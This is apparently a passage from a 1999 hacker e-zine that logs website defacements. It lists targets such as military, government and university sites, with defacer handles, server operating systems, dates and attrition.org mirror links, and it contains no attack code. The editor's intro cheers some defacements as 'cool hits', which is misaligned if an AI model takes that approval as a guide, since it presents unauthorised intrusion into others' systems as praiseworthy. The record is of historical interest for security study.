Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
>Start<
Naval School of Health Sciences (www-nshs.med.navy.mil)
Energy Systems Division, Argonne National Labs (www.es.anl.gov)
Solid State Theory Group, National Renewable Energy Laboratory
(www.sst.nrel.gov)
Naval Medical Research Institute (www.nmri.nnmc.navy.mil)
National Institute on Alcohol Abuse and Alcoholism
(www.niaaa.nih.gov)
USDA Rural Development (www.rurdev.usda.gov)
U.S. Tax Court (www.ustaxcourt.gov)
Federal Occupational Health, DHHS (www.foh.dhhs.gov)
Rural Empowerment Zones and Enterprise Communities, USDA and
HUD (www.ezec.gov)
U.S. Navy Electronic Commerce Homepage (www.ec.navsup.
navy.mil)
Defense Commissary Agency (www.deca.mil)
#2 Malaysian Science and Technology Information Centre
(www.mastic.gov.my)
Banco Federativo (federativo.bndes.gov.br)
Account View (www.accountview.nl)
#2 Bureau of Transportation for Taipei City (www.dot.taipei.gov.tw)
Nanning - Guangxi (www.nn.gx.cn)
Defaced domain: dssg-web-srv.ncr.disa.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/dssg-web-srv.ncr.disa.mil
Defaced by: fuqraq
Operating System: NT
Date 11/1/99
Defaced domain: www.adb-partner.no
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.adb-partner.no
Defaced by: unknown
Operating System: NT
Date 11/1/99
Defaced domain: www.shop.worldonline.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.shop.worldonline.nl
Defaced by: unknown
Operating System: NT
Date 11/1/99
Defaced domain: www.mita.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.mita.nl
Defaced by: Phreak.nl
Operating System: NT
Date 11/1/99
Defaced domain: ustecnet.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/ustecnet.com
Defaced by: dhc
Operating System: NT
Date 11/1/99
Defaced domain: dawn.worldonline.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/dawn.worldonline.nl
Defaced by: phreak.nl
Operating System: NT
Date 11/1/99
Defaced domain: hydr.ct.tudelft.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/hydr.ct.tudelft.nl
Defaced by: phreak.nl
Operating System: NT
Date 11/1/99
Defaced domain: www.netopia.no
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.netopia.no
Defaced by: unknown
Operating System: NT
Date 11/1/99
Defaced domain: www.adam.au.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.adam.au.com
Defaced by: phreak.nl
Operating System: Linux
Date 11/1/99
Defaced domain: www.dnd.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.dnd.ca
Defaced by: hv2k
Operating System: NT
Date 11/1/99
Defaced domain: www.itcampeche.edu.mx
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.itcampeche.edu.mx
Defaced by: treaty
Operating System: Solaris
Date 11/1/99
Defaced domain: www.doeal.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.doeal.gov
Defaced by: Pakistan HC
Operating System: Windows NT (IIS/4.0)
Date 11/1/99
Defaced domain: maif.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/maif.gov
Defaced by: Hi-Tech Hate/h4p
Operating System: Fingerprint failed (!)
Date 11/1/99
Defaced domain: webster.webfld.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/webster.webfld.navy.mil
Defaced by: hv2k
Operating System: NT
Date 11/1/99
Defaced domain: www.ummah.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.ummah.net
Operating System: FreeBSD (Apache 1.3b5)
Date 11/1/99
Defaced domain: www.cnu.gov.ve
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.cnu.gov.ve
Defaced by: Hven team
Operating System: Windows NT
Date 11/1/99
Defaced domain: www.iwakuni.usmc.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.iwakuni.usmc.mil
Defaced by: hV2k
Operating System: Windows NT
Date 11/1/99
Defaced domain: www.norfolk.atrc.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.norfolk.atrc.navy.mil
Defaced by: hV2k
Operating System: Windows NT
Date 11/1/99
Defaced domain: www.tenderimages.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.tenderimages.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Date 11/2/99
Defaced domain: www.esdcinc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/www.esdcinc.com
Defaced by: Contr0l-C
Operating System: Windows NT (IIS/4.0)
Date 11/2/99
Defaced domain: www.fbody.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.fbody.com
Defaced by: HiP
Operating System: BSDI 3.0 (Apahe 1.2.6)
Date 11/2/99
Defaced domain: www.hardcorebands.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.hardcorebands.com
Defaced by: HiP
Operating System: Linux (Apache/1.3.3)
Date 11/2/99
Defaced domain: federativo.bndes.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/01/federativo.bndes.gov.br
Defaced by: JxLxMx
Operating System: NT
Date 11/2/99
Defaced domain: www.seplan.gov.br #1
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.seplan.gov.br
Defaced by: JxLxMx
Operating System: NT
Defaced domain: www.kyungsung.ac.kr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.kyungsung.ac.kr
Defaced by: kryptek
Operating System: Solaris
Date 11/2/99
Defaced domain: www.gennet.ee
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.gennet.ee
Defaced by: Verb0
Operating System: Windows NT
Date 11/2/99
Defaced domain: www.chapman-lab.uaf.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.chapman-lab.uaf.edu
Defaced by: Verb0
Operating System: Windows NT
Date 11/2/99
Defaced domain: www.seplan.gov.br #2
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.seplan.gov.br
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99
Defaced domain: www.mog.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.mog.gov.br
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99
Defaced domain: www.cateringnet.co.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.cateringnet.co.uk
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99
Defaced domain: www.creactive.fr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.creactive.fr
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99
Defaced domain: www.nn.gx.cn
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.nn.gx.cn
Defaced by: kryptek
Operating System: Solaris
Date 11/2/99
Defaced domain: www.statssa.gov.za
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.statssa.gov.za
Defaced by: Fuby
Operating System: Windows NT
Date 11/2/99
Defaced domain: www.accountview.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.accountview.nl
Defaced by: Hit2000
Operating System: Windows NT (IIS/4.0)
Date 11/2/99
Defaced domain: www-nehc.med.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www-nehc.med.navy.mil
Operating System: Windows NT (IIS/4.0)
Date 11/2/99
Defaced domain: www.dot.taipei.gov.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.dot.taipei.gov.tw
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Date 11/2/99
Defaced domain: federativo.bndes.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/federativo.bndes.gov.br
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Date 11/2/99
Defaced domain: www.mastic.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.mastic.gov.my
Defaced by: Fuby
Operating System: Windows NT (IIS/3.0)
Date 11/2/99
Defaced domain: www.deca.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.deca.mil
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/2/99
Defaced domain: www.cipex.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.cipex.com.br
Defaced by: Death Knights
Operating System: Linux (Apache 1.3.6)
Date 11/2/99
Defaced domain: www.paradoxtech.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.paradoxtech.com
Defaced by: n45ty
Operating System: Linux (Apache 1.3.6)
Date 11/2/99
Defaced domain: www.ngc.peachnet.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ngc.peachnet.edu
Defaced by: xhostile and MetalTung
Operating System: Windows NT (IIS/4.0)
Date 11/3/99
Defaced domain: www.ezec.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ezec.gov
Defaced by: hV2k
Operating System: NT
Date 11/3/99
Defaced domain: www.foh.dhhs.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.foh.dhhs.gov
Defaced by: hV2k
Operating System: NT
Date 11/3/99
Defaced domain: www.copcomputer.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.copcomputer.com
Operating System: BSDI (Apache 1.2.4)
Date 11/3/99
Defaced domain: www.ec.navsup.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/02/www.ec.navsup.navy.mil
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/3/99
Defaced domain: www.statssa.gov.za
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.statssa.gov.za
Defaced by: OzzMan
Operating System: Windows NT
Date 11/3/99
Defaced domain: www.sefaz.go.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.sefaz.go.gov.br
Defaced by: Inferno.BR
Operating System: Windows NT
Date 11/3/99
Defaced domain: www.ktb.co.kr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ktb.co.kr
Defaced by: kryptek
Operating System: Solaris 2.5x (NCSA/1.5)
Date 11/3/99
Defaced domain: www.rurdev.usda.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.rurdev.usda.gov
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/3/99
Defaced domain: www.ustaxcourt.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ustaxcourt.gov
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/3/99
Defaced domain: www.cram-sudest.fr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.cram-sudest.fr
Defaced by: JLM
Operating System: Windows NT (IIS/4.0)
Date 11/3/99
Defaced domain: www.bearland.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.bearland.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Date 11/3/99
Defaced domain: www.nyise.org/access
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nyise.org/access
Defaced by: PhantasmP
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.coopvgg.com.ar
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.coopvgg.com.ar
Defaced by: vendetta
Operating System: Solaris 2.x (Netscape-Enterprise 3.5.1)
Date 11/3/99
Defaced domain: mecara.fpms.ac.be
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/mecara.fpms.ac.be
Defaced by: Genocide Juice
Operating System: Linux
Date 11/3/99
Defaced domain: www.ceaa.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.ceaa.gc.ca
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/3/99
Defaced domain: www.nf.hrdc-drhc.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nf.hrdc-drhc.gc.ca
Defaced by: hV2k
Operating System: NT
Date 11/3/99
Defaced domain: www.nf.hrdc-drhc.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nf.hrdc-drhc.gc.ca
Defaced by: hV2k
Operating System: NT
Date 11/4/99
Defaced domain: www.acadiau.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/www.acadiau.ca
Defaced by: p0g0
Operating System: Solaris 2.5x (Apache 1.3.1)
Date 11/4/99
Defaced domain: www.ftscpac.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/10/30/www.ftscpac.navy.mil
Defaced by: Pakistan Hackerz Club
Operating System: Windows NT
Date 11/4/99
Defaced domain: www.lcc.whecn.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.lcc.whecn.edu
Defaced by: MetalTung and xhostile
Operating System: NT
Date 11/4/99
Defaced domain: www.oak.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.oak.edu
Defaced by: xhostile and MetalTung
Operating System: NT
Date 11/4/99
Defaced domain: www.gov.nf.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.gov.nf.ca
Defaced by: hV2k
Operating System: NT
Date 11/4/99
Defaced domain: www.borealc.on.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.borealc.on.ca
Defaced by: Adoni and symbolik
Operating System: NT
Date 11/4/99
Defaced domain: www.nmri.nnmc.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/03/www.nmri.nnmc.navy.mil
Defaced by: fuqrag
Operating System: NT
Date 11/4/99
Defaced domain: www.pakbiz.com.pk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.pakbiz.com.pk
Defaced by: h1gh
Operating System: PowerBSD - Apache/1.2.6
Date 11/4/99
Defaced Page: http://www.navy.mi.th/main.htm
Defaced by: Verbo
OS: Windows NT/IIS 3.0
Date 11/4/99
Defaced domain: www.beckie.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.beckie.com
Defaced by: Blade/Psycho Surfer
Operating System: NT
Date 11/4/99
Defaced domain: www.mastic.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.mastic.gov.my
Defaced by: fuby
Operating System: NT
Date 11/4/99
Defaced domain: innebandy.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/innebandy.net
Defaced by: SunDevil & Zolar
Operating System: NT
Date 11/4/99
Defaced domain: www.sci.hiroshima-u.ac.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.sci.hiroshima-u.ac.jp
Defaced by: kryptek
Operating System: Solaris
Date 11/4/99
Defaced domain: www.zedd.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.zedd.com
Defaced by: SunDevil
Operating System: NT
Date 11/4/99
Defaced domain: www.cga.state.ct.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.cga.state.ct.us
Defaced by: aL3x
Operating System: NT
Date 11/4/99
Defaced domain: www.perfectplan.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.perfectplan.com
Defaced by: SunDevil
Operating System: NT
Date 11/4/99
Defaced domain: www.sst.nrel.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.sst.nrel.gov
Defaced by: hV2k
Operating System: NT
Date 11/4/99
Defaced domain: www.nyise.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.nyise.org
Defaced by: Fuby (again)
Operating System: Windows NT (IIS/4.0)
Date 11/4/99
Defaced domain: www.es.anl.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.es.anl.gov
Defaced by: hV2k
Operating System: NT
Date 11/4/99
Defaced domain: www.digisys.com.lb
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.digisys.com.lb
Defaced by: w0lf
Operating System: Irix
Date 11/4/99
Defaced domain: www.melissa.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.melissa.com
Defaced by: p4riah
Operating System: Solaris
Date 11/4/99
Defaced domain: www.lucifer.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.lucifer.com
Defaced by: Gabriel
Operating System: Linux
Date 11/4/99
Defaced domain: www.saltillo.gob.mx
Mirror: http://www.attrition.org/mirror/attrition/1999/11/04/www.saltillo.gob.mx
Defaced by: hi tech hate
Operating System: SCO
Date 11/5/99
Defaced domain: russian.dmll.cornell.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/russian.dmll.cornell.edu
Defaced by: Narcissus
Operating System: Windows NT (WebSite/1.1h)
Date 11/5/99
Defaced domain: www.nabco.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.nabco.org
Defaced by: kryptek
Operating System: Solaris
Date 11/5/99
Defaced domain: www.financials98.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.financials98.com
Defaced by: verb0
Operating System: NT
Date 11/5/99
Defaced: www.jn.pt
By: f0rpaxe
mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.jn.pt/
os: Windows NT (IIS/4.0)
Date 11/5/99
Defaced domain: www-nshs.med.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www-nshs.med.navy.mil
Defaced by: Verb0
Operating System: Windows NT
Date 11/5/99
Defaced domain: www.aecl.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.aecl.ca
Defaced by: ch4x
Operating System: NT
Date 11/5/99
Defaced domain: www.freeshells.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.freeshells.com
Defaced by: xhostile
Operating System: NT
Date 11/5/99
Defaced domain: parkscanada.pch.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/parkscanada.pch.gc.ca
Defaced by: chem/Shark
Operating System: NT
Date 11/5/99
Defaced domain: interal.qc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/interal.qc.ca
Defaced by: unknown
Operating System: NT
Date 11/5/99
Defaced domain: canadacouncil.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/canadacouncil.ca
Defaced by: unknown
Operating System: NT
Date 11/5/99
Defaced domain: www.cornwall.ac.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.cornwall.ac.uk
Defaced by: vendetta
Operating System: Solaris
Date 11/5/99
Defaced domain: www.tax.state.ny.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.tax.state.ny.us
Defaced by: hV2k
Operating System: NT
Date 11/6/99
Defaced domain: janus.state.me.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/janus.state.me.us
Defaced by: hV2k
Operating System: NT
Date 11/6/99
Defaced domain: www.buddhakatrecords.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.buddhakatrecords.com
Defaced by: Pinky The Penguin
Operating System: NT
Date 11/6/99
Site:www.samhsa.gov
OS: NT/IIS4.0
Group: keebler elves (their back)
Date 11/6/99
Defaced domain: www.parkscanada.pch.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.parkscanada.pch.gc.ca
Defaced by: chem/Shark
Operating System: NT
Date 11/6/99
Defaced domain: www.keebler.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.keebler.com
Defaced by: keebler
Operating System: NT
Date 11/6/99
Defaced domain: www.gordongraydon.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.gordongraydon.com
Defaced by: pyrostorm
Operating System: Linux
Date 11/6/99
Defaced domain: www.cub-ed.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.cub-ed.com
Defaced by: p4riah
Operating System: NT
Date 11/6/99
Defaced domain: www.army.mod.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.army.mod.uk
Defaced by: keebler elves
Operating System: NT
Date 11/6/99
Defaced domain: www.eucom.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.eucom.mil
Defaced by: keebler elves
Operating System: NT
Date 11/6/99
Defaced domain: www.keebler.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.keebler.com
Defaced by: unknown
Operating System: NT
Date 11/6/99
Defaced domain: www.cnv.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.cnv.org
Defaced by: keebler elves
Operating System: NT
Date 11/6/99
Defaced domain: lgenterprises.threadnet.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/lgenterprises.threadnet.com
Defaced by: DHC
Operating System: Linux
Date 11/6/99
Defaced domain: www.hwa.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.hwa.net
Defaced by: ch4x
Operating System: NT
Date 11/6/99
Defaced domain: www.click2u.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.click2u.com
Defaced by: ytcracker
Operating System: Windows NT (WebSitePro/2.4.5)
Date 11/6/99
Defaced domain: www.fintrac.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.fintrac.com
Defaced by: coderz
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: acc02.acc1.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/acc02.acc1.edu
Defaced by: Verb0
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: www.utaced.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.utaced.edu
Defaced by: Verb0
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: www.salton-maxim.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.salton-maxim.com
Defaced by: ne0h
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: 209.247.153.200
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/209.247.153.200
Defaced by: nawk
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: www.keimyung.ac.kr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.keimyung.ac.kr
Defaced by: project x
Operating System: Solaris 2.x (Apache 1.3.3)
Date 11/6/99
Defaced domain: www.peoplesupport.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.peoplesupport.com
Defaced by: MetalTung
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: dmla.clan.lib.nv.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/dmla.clan.lib.nv.us
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: www.spa.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.spa.gov.my
Defaced by: OySTr n KLaM
Operating System: Solaris 2.5x (Apache 1.3.3)
Date 11/6/99
Defaced domain: sex-offender.vsp.state.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/sex-offender.vsp.state.va.us
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: www.state.co.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.state.co.us
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: www.ci.arlington.tx.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.ci.arlington.tx.us
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: police.ci.berkeley.ca.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/police.ci.berkeley.ca.us
Defaced by: hV2k
Operating System: Windows NT (IIS/4.)
Date 11/6/99
Defaced domain: www.brasemb.or.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.brasemb.or.jp
Defaced by: JLM
Operating System: Windows NT (IIS/4.0)
Date 11/6/99
Defaced domain: infobase.ic.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/infobase.ic.gc.ca
Defaced by: ch4x
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: www.hoehne.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.hoehne.com
Defaced by: xhostile
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: www.cegep-heritage.qc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.cegep-heritage.qc.ca
Defaced by: ch4x
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: www.t75warez.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.t75warez.com
Defaced by: globher
Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.3.6)
Date 11/7/99
Defaced domain: ameribusiness.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ameribusiness.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: chilewebdirectory.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chilewebdirectory.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: atlaslink.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/atlaslink.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: directorioantofagasta.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directorioantofagasta.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: ajokeaday.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ajokeaday.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: appraise-now.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/appraise-now.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: chistes.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chistes.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: directorioconcepcion.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directorioconcepcion.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: arachnidbait.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/arachnidbait.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: ayudante.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ayudante.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: earlywarningalarms.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/earlywarningalarms.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: filmmakersworldwide.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/filmmakersworldwide.com
Defaced by: acid k|own
Operating System: echo "internetsecurity.com" >> filmmakersworldwide.com
Date 11/7/99
Defaced domain: chicago911.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chicago911.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: crghrz.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/crghrz.com
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: herdaddy.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/herdaddy.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: directoriovalparaiso.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directoriovalparaiso.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: ecuadorwebdirectory.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ecuadorwebdirectory.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: icuss.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/icuss.net
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: laventaja.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/laventaja.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: justmfg.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/justmfg.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: noidos.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/noidos.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: mexicowebdirectory.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/mexicowebdirectory.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: atlantisinc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/atlantisinc.com
Defaced by: Narcissus
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: pay-per-search.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/pay-per-search.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: www.tatincom.ru
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tatincom.ru
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: protectionelectronics.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/protectionelectronics.com
Defaced by: acid k|own
